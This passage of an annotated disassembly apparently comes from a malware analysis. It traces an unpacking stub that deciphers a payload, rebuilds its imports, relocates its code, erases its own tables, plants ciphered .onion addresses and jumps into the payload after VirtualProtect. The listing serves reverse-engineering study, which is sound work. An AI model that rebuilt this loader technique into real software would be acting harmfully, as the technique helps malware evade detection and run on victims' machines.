and EDX=remainder). 0x34/9 => EAX=5 EDX=7 seg000:00C122CB push 5 seg000:00C122CD pop edi ; EDI=5 seg000:00C122CE push 4 ; PAGE_READWRITE seg000:00C122D0 push 1000h ; MEM_COMMIT seg000:00C122D5 mov [ebp-8], esi ; [EBP-8] = B70000h seg000:00C122D8 mov [ebp-0Ch], ebx ; [EBP-0Ch] = block size, ie 0x21A000 seg000:00C122DB mov ecx, edx ; ECX=7 seg000:00C122DD xor edx, edx seg000:00C122DF div edi ; EAX/EDI (EAX=quotient et EDX=reste). 5/5 => EAX=1 EDX=0 seg000:00C122E1 mov [ebp-20h], ecx seg000:00C122E4 mov edi, 300h seg000:00C122E9 mov [ebp-18h], eax seg000:00C122EC mov eax, edx seg000:00C122EE add ecx, eax seg000:00C122F0 shl edi, cl ; EDI=18000h seg000:00C122F2 mov [ebp-1Ch], eax seg000:00C122F5 add edi, 736h ; EDI=18736h seg000:00C122FB lea eax, [ebx+edi*2] ; EAX=24AE6Ch seg000:00C122FE push eax seg000:00C122FF mov eax, [ebp+8] ; EAX=401000h seg000:00C12302 push 0 seg000:00C12304 call dword ptr [eax+4] ; EAX = VirtualAlloc ( NULL, 0x24AE6C, MEM_COMMIT, PAGE_READWRITE ); seg000:00C12307 mov ebx, eax ; EAX=D90000h seg000:00C12309 mov eax, [ebp-0Ch] seg000:00C1230C add eax, ebx ; EAX=FAA000h seg000:00C1230E lea edx, [ebp-44h] ; EDX is used to pass parameters to the next function called [EDX], [EDX+18h], [EDX+24h] et [EDX+28h] seg000:00C12311 mov [ebp-40h], ebx ; New allocated block seg000:00C12314 mov [ebp-44h], eax ; EAX=0xFAA000 seg000:00C12317 mov [ebp-28h], edi ; EDI=0x18736 seg000:00C1231A call fill_with_0x400 seg000:00C1231F mov eax, [esi+2Eh] ; 0x6F000000 seg000:00C12322 push dword ptr [ebp-4] seg000:00C12325 or dword ptr [ebp-38h], 0FFFFFFFFh seg000:00C12329 and dword ptr [ebp-30h], 0 seg000:00C1232D add esi, 32h ; ESI=0xB70032 seg000:00C12330 bswap eax ; EAX=0x6F00 seg000:00C12332 mov [ebp-3Ch], esi seg000:00C12335 mov esi, edx ; ESI will be used to access parameters in the deciphering function to call seg000:00C12337 mov [ebp-34h], eax seg000:00C1233A call sub_C11EC3 ; <======================= Deciphering payload !!! seg000:00C1233F mov eax, [ebp-8] ; EAX=0xB70000 seg000:00C12342 mov esi, [eax] seg000:00C12344 add esi, ebx ; ESI refers 00F9D03C which contains "KERNEL32.dll"... seg000:00C12346 mov [ebp-4], esi seg000:00C12349 jmp short loc_C12387 seg000:00C1234B ; --------------------------------------------------------------------------- seg000:00C1234B seg000:00C1234B seg000:00C1234B ;********************************************************************************* seg000:00C1234B ;* This part gets all imports necessary (listed at 0xF9D03C) seg000:00C1234B ;* seg000:00C1234B ;* Format = [Library1 name]\0[Function Name]\0[Pointer to function address] seg000:00C1234B ;* ... seg000:00C1234B ;* [Function Name]\0[Pointer to function address]\0 seg000:00C1234B ;* [Library2 name]\0[Function Name]\0[Pointer to function address] seg000:00C1234B ;* ... seg000:00C1234B ;* [Function Name]\0[Pointer to function address]\0\0 seg000:00C1234B ;* seg000:00C1234B ;* Size of imports = 0x1561 seg000:00C1234B ;********************************************************************************* seg000:00C1234B seg000:00C1234B loc_C1234B: ; CODE XREF: seg000:00C1238A seg000:00C1234B mov edi, [ebp+8] seg000:00C1234E push esi ; "KERNEL32.dll" seg000:00C1234F call dword ptr [edi] ; LoadLibrary() seg000:00C12351 mov [ebp-0Ch], eax seg000:00C12354 ; seg000:00C12354 ; Next function name please seg000:00C12354 seg000:00C12354 loc_C12354: ; CODE XREF: seg000:00C12359 seg000:00C12354 mov al, [esi] seg000:00C12356 inc esi seg000:00C12357 test al, al seg000:00C12359 jnz short loc_C12354 seg000:00C1235B seg000:00C1235B loc_C1235B: ; CODE XREF: seg000:00C12384 seg000:00C1235B cmp byte ptr [esi], 1 seg000:00C1235E mov eax, esi seg000:00C12360 jnz short loc_C1236B seg000:00C12362 movzx eax, word ptr [esi+1] seg000:00C12366 add esi, 3 seg000:00C12369 jmp short loc_C12372 seg000:00C1236B ; --------------------------------------------------------------------------- seg000:00C1236B ; seg000:00C1236B ; Move forward to the end of function name seg000:00C1236B seg000:00C1236B loc_C1236B: ; CODE XREF: seg000:00C12360 seg000:00C1236B ; seg000:00C12370 seg000:00C1236B mov cl, [esi] seg000:00C1236D inc esi seg000:00C1236E test cl, cl seg000:00C12370 jnz short loc_C1236B seg000:00C12372 seg000:00C12372 loc_C12372: ; CODE XREF: seg000:00C12369 seg000:00C12372 push eax ; Stacks function name seg000:00C12373 push dword ptr [ebp-0Ch] ; Stacks DLL handle seg000:00C12376 call dword ptr [edi+0Ch] ; GetProcAddress() seg000:00C12379 mov ecx, [esi] ; ECX = offset for saving function address seg000:00C1237B add esi, 4 ; Next function name seg000:00C1237E mov [ecx+ebx], eax ; Saving function address (ebx = process base address in memory, ie 0xD90000) seg000:00C12381 cmp byte ptr [esi], 0 ; Is there another function address to get ? seg000:00C12384 jnz short loc_C1235B seg000:00C12386 inc esi seg000:00C12387 seg000:00C12387 loc_C12387: ; CODE XREF: seg000:00C12349 seg000:00C12387 cmp byte ptr [esi], 0 seg000:00C1238A jnz short loc_C1234B seg000:00C1238A seg000:00C1238A seg000:00C1238C ;--------------------------------------------------------------------------------- seg000:00C1238C ; Now erase the import table... seg000:00C1238C ; ...and move to the next table (relocations one) seg000:00C1238C seg000:00C1238C sub esi, [ebp-4] seg000:00C1238F mov [ebp-0Ch], esi seg000:00C12392 mov edi, [ebp-4] ; EDI refers start of imports table (0xF9D03C) seg000:00C12395 xor eax, eax ; Fill the block with '0' seg000:00C12397 mov ecx, [ebp-0Ch] ; ECX = 0x1561 (block size to erase) seg000:00C1239A rep stosb ; Erasing... seg000:00C1239C mov eax, [ebp-8] ; EAX=B70000 (start of allocated block) seg000:00C1239F mov eax, [eax+4] ; EAX=0x20E59E seg000:00C123A2 add eax, ebx ; EAX = F9E59E, ie block just after the one we erased... seg000:00C123A4 mov [ebp-4], eax seg000:00C123A7 mov esi, 1000h ; Starting to relocate at offset 0x1000 seg000:00C123AC xor edi, edi seg000:00C123AE jmp loc_C12456 seg000:00C123AE seg000:00C123AE seg000:00C123AE seg000:00C123AE ; ******************************************************************************** seg000:00C123AE ; * Relocate all jmp, call, jxx and constant addresses * seg000:00C123AE ; ******************************************************************************** seg000:00C123B3 seg000:00C123B3 loc_C123B3: ; CODE XREF: seg000:00C1245A seg000:00C123B3 movzx ecx, cl seg000:00C123B6 inc eax ; Next byte in relocation table seg000:00C123B7 cmp ecx, 2 seg000:00C123BA jnz short threeBytesOffset seg000:00C123BC movzx ecx, word ptr [eax] ; Gets two bytes in relocation table seg000:00C123BF add eax, 2 ; Moves forward two bytes in relocation table seg000:00C123C2 jmp short loc_C123D4 seg000:00C123C4 ; --------------------------------------------------------------------------- seg000:00C123C4 seg000:00C123C4 threeBytesOffset: ; CODE XREF: seg000:00C123BA seg000:00C123C4 cmp ecx, 3 seg000:00C123C7 jnz short loc_C123D4 seg000:00C123C9 mov ecx, [eax] seg000:00C123CB and ecx, 0FFFFFFh seg000:00C123D1 add eax, 3 seg000:00C123D4 seg000:00C123D4 loc_C123D4: ; CODE XREF: seg000:00C123C2 seg000:00C123D4 ; seg000:00C123C7 seg000:00C123D4 add edi, ecx ; EDI = next offset with a constant address to relocate seg000:00C123D6 mov ecx, [ebp-8] ; ECX = 0xB70000 seg000:00C123D9 mov ecx, [ecx+0Ch] ; ECX = ? seg000:00C123DC cmp esi, ecx seg000:00C123DE jnb short relocConstant seg000:00C123E0 ; seg000:00C123E0 lea edx, [edi-5] ; EDX=EDI-5 seg000:00C123E3 add ecx, 0FFFFFFFCh ; ECX=ECX-4 seg000:00C123E6 mov [ebp-0Ch], edx ; [ebp-0Ch] = next offset to relocate seg000:00C123E9 cmp edx, ecx ; If next offset is after end seg000:00C123EB jbe short loc_C12444 seg000:00C123ED mov [ebp-0Ch], ecx ; So next offset = end seg000:00C123F0 jmp short loc_C12444 seg000:00C123F2 ; --------------------------------------------------------------------------- seg000:00C123F2 seg000:00C123F2 lookForCallJmpJxx: ; CODE XREF: seg000:00C12447 seg000:00C123F2 mov cl, [esi+ebx] seg000:00C123F5 cmp cl, 0E8h ; CALL opcode ! seg000:00C123F8 jz short relocCallOrJmp seg000:00C123FA cmp cl, 0E9h ; JMP opcode ! seg000:00C123FD jz short relocCallOrJmp seg000:00C123FF cmp cl, 0Fh ; Two bytes instruction seg000:00C12402 jnz short NextSrcByte seg000:00C12404 mov cl, [esi+ebx+1] seg000:00C12408 and cl, 0F0h ; testing 4 heavy bits (conditional jump instructions have opcodes 0xOF81 to 0xOF8F) seg000:00C1240B cmp cl, 80h seg000:00C1240E jnz short NextSrcByte ; No Jmp or Call, so next byte please... seg000:00C12410 lea ecx, [edi-6] seg000:00C12413 cmp esi, ecx seg000:00C12415 ja short NextSrcByte seg000:00C12417 ; seg000:00C12417 ; relocate conditional jump seg000:00C12417 mov ecx, [esi+ebx+2] ; ECX = jmp offset seg000:00C1241B push 0FFFFFFFAh ; EDX = ESI+5 seg000:00C1241D pop edx seg000:00C1241E sub edx, esi seg000:00C12420 bswap ecx ; Endian modification seg000:00C12422 add ecx, edx ; Adds base seg000:00C12424 mov [esi+ebx+2], ecx ; Puts offset in place seg000:00C12428 add esi, 6 seg000:00C1242B jmp short loc_C12444 seg000:00C1242D ; --------------------------------------------------------------------------- seg000:00C1242D seg000:00C1242D NextSrcByte: ; CODE XREF: seg000:00C12402 seg000:00C1242D ; seg000:00C1240E ... seg000:00C1242D inc esi seg000:00C1242E jmp short loc_C12444 seg000:00C12430 ; --------------------------------------------------------------------------- seg000:00C12430 seg000:00C12430 relocCallOrJmp: ; CODE XREF: seg000:00C123F8 seg000:00C12430 ; seg000:00C123FD seg000:00C12430 mov ecx, [esi+ebx+1] ; ECX = DWORD following 0xE8 or 0xE9, ie call or jmp destination seg000:00C12434 push 0FFFFFFFBh ; Adds 5 to ESI to skip the 0xEx and destination DWORD seg000:00C12436 pop edx seg000:00C12437 sub edx, esi seg000:00C12439 bswap ecx ; Endian modification seg000:00C1243B add ecx, edx ; Adds base seg000:00C1243D mov [esi+ebx+1], ecx ; Puts modified DWORD in place seg000:00C12441 add esi, 5 ; Moves ESI to skip the DWORD seg000:00C12444 seg000:00C12444 loc_C12444: ; CODE XREF: seg000:00C123EB seg000:00C12444 ; seg000:00C123F0 ... seg000:00C12444 cmp esi, [ebp-0Ch] ; Block end ? seg000:00C12447 jbe short lookForCallJmpJxx ; No, next byte of code... seg000:00C12449 lea esi, [edi+4] ; ESI=EDI+4 seg000:00C1244C seg000:00C1244C relocConstant: ; CODE XREF: seg000:00C123DE seg000:00C1244C mov ecx, [edi+ebx] seg000:00C1244F bswap ecx seg000:00C12451 add ecx, ebx seg000:00C12453 mov [edi+ebx], ecx seg000:00C12456 seg000:00C12456 loc_C12456: ; CODE XREF: seg000:00C123AE seg000:00C12456 mov cl, [eax] ; Taking one byte from relocations table seg000:00C12458 test cl, cl seg000:00C1245A jnz loc_C123B3 seg000:00C12460 ; seg000:00C12460 ;-------------------------------------------------------------------------- seg000:00C12460 ; Erase the relocation table we just use seg000:00C12460 sub eax, [ebp-4] seg000:00C12463 mov [ebp-0Ch], eax seg000:00C12466 mov edi, [ebp-4] seg000:00C12469 xor eax, eax seg000:00C1246B mov ecx, [ebp-0Ch] seg000:00C1246E rep stosb ; Erasing 0x4F34 bytes long block seg000:00C1246E seg000:00C1246E seg000:00C1246E seg000:00C12470 ;***************************************************************************** seg000:00C12470 ;* Search a signature in OxD90000 block seg000:00C12470 ;***************************************************************************** seg000:00C12470 mov eax, [ebp-10h] seg000:00C12473 mov ecx, [eax] seg000:00C12475 and dword ptr [ebp-4], 0 seg000:00C12479 lea edi, [ecx-40h] seg000:00C1247C test edi, edi seg000:00C1247E jz short loc_C124E0 seg000:00C12480 mov dword ptr [ebp-0Ch], 0Ch seg000:00C12487 sub [ebp-0Ch], ebx seg000:00C1248A mov esi, ebx ; ESI = 0xD90000 seg000:00C1248C seg000:00C1248C loc_C1248C: ; CODE XREF: seg000:00C124C8 seg000:00C1248C cmp dword ptr [esi], 63232D21h ; '!-#c' seg000:00C12492 mov [ebp-14h], esi seg000:00C12495 jnz short loc_C124C1 seg000:00C12497 cmp dword ptr [esi+4], 65626766h ; 'fgbe' seg000:00C1249E jnz short loc_C124C1 seg000:00C124A0 cmp dword ptr [esi+8], 21232D67h ; 'g_#!' seg000:00C124A7 jnz short loc_C124C1 seg000:00C124A9 mov eax, [ebp-0Ch] seg000:00C124AC add eax, esi seg000:00C124AE lea edx, [ecx-4] seg000:00C124B1 jmp short loc_C124BD seg000:00C124B3 ; --------------------------------------------------------------------------- seg000:00C124B3 seg000:00C124B3 loc_C124B3: ; CODE XREF: seg000:00C124BF seg000:00C124B3 cmp dword ptr [ebx+eax], 21444E45h ; 'END!' seg000:00C124BA jz short loc_C124CC seg000:00C124BC inc eax seg000:00C124BD seg000:00C124BD loc_C124BD: ; CODE XREF: seg000:00C124B1 seg000:00C124BD cmp eax, edx seg000:00C124BF jb short loc_C124B3 seg000:00C124C1 seg000:00C124C1 loc_C124C1: ; CODE XREF: seg000:00C12495 seg000:00C124C1 ; seg000:00C1249E ... seg000:00C124C1 inc dword ptr [ebp-4] seg000:00C124C4 inc esi seg000:00C124C5 cmp [ebp-4], edi seg000:00C124C8 jb short loc_C1248C seg000:00C124CA jmp short loc_C124E0 seg000:00C124CC seg000:00C124CC seg000:00C124CC seg000:00C124CC ;***************************************************************************** seg000:00C124CC ;* Pick a block in 0x4A439A, ie in the payload in the .rsrc and copy it in the seg000:00C124CC ;* signature block (block copied contains ciphered .onion addresses) seg000:00C124CC ;***************************************************************************** seg000:00C124CC loc_C124CC: ; CODE XREF: seg000:00C124BA seg000:00C124CC sub eax, [ebp-4] ; EAX=0x84 (difference between signature and "END!") seg000:00C124CF add eax, 4 seg000:00C124D2 mov [ebp-10h], eax seg000:00C124D5 mov esi, [ebp+10h] ; ESI=0x4A439A seg000:00C124D8 mov edi, [ebp-14h] ; EDI=0xE931B0 (ie signature '!-#cfgbeg-#!') seg000:00C124DB mov ecx, [ebp-10h] ; ECX=0x88 seg000:00C124DE rep movsb seg000:00C124E0 seg000:00C124E0 loc_C124E0: ; CODE XREF: seg000:00C1247E seg000:00C124E0 ; seg000:00C124CA seg000:00C124E0 lea eax, [ebp+0Ch] seg000:00C124E3 push eax ; lpOldProtect = [EBP+0Ch] seg000:00C124E4 mov eax, [ebp-8] ; EAX=0xB70000 seg000:00C124E7 push 20h ; newProtect = 0x20 seg000:00C124E9 push dword ptr [eax+0Ch] ; size = 0x0E4709 seg000:00C124EC mov eax, [ebp+8] ; EAX = 0x40100 seg000:00C124EF push ebx ; lpAddress = EBX = 0xD90000 seg000:00C124F0 call dword ptr [eax+8] ; 0x7C801AD4 => VirtualProtect (); seg000:00C124F3 mov eax, [ebp-8] ; EAX=0xB70000 seg000:00C124F6 mov eax, [eax+8] ; EAX = 0x03368D seg000:00C124F9 add eax, ebx ; EAX = 0xDC368D seg000:00C124FB call eax ; ======> 0xDC368D seg000:00C124FD pop edi seg000:00C124FE pop esi seg000:00C124FF pop ebx seg000:00C12500 leave seg000:00C12501 retn 0Ch seg000:00C12504 seg000:00C12504 seg000:00C12504 seg000:00C12504 ; ********************************************************** seg000:00C12504 ; * Entering by here !!! * seg000:00C12504 ; ********************************************************** seg000:00C12504 seg000:00C12504 jmp loc_C122A6 seg000:00C12504 ; ---------------------------------------------------------------------------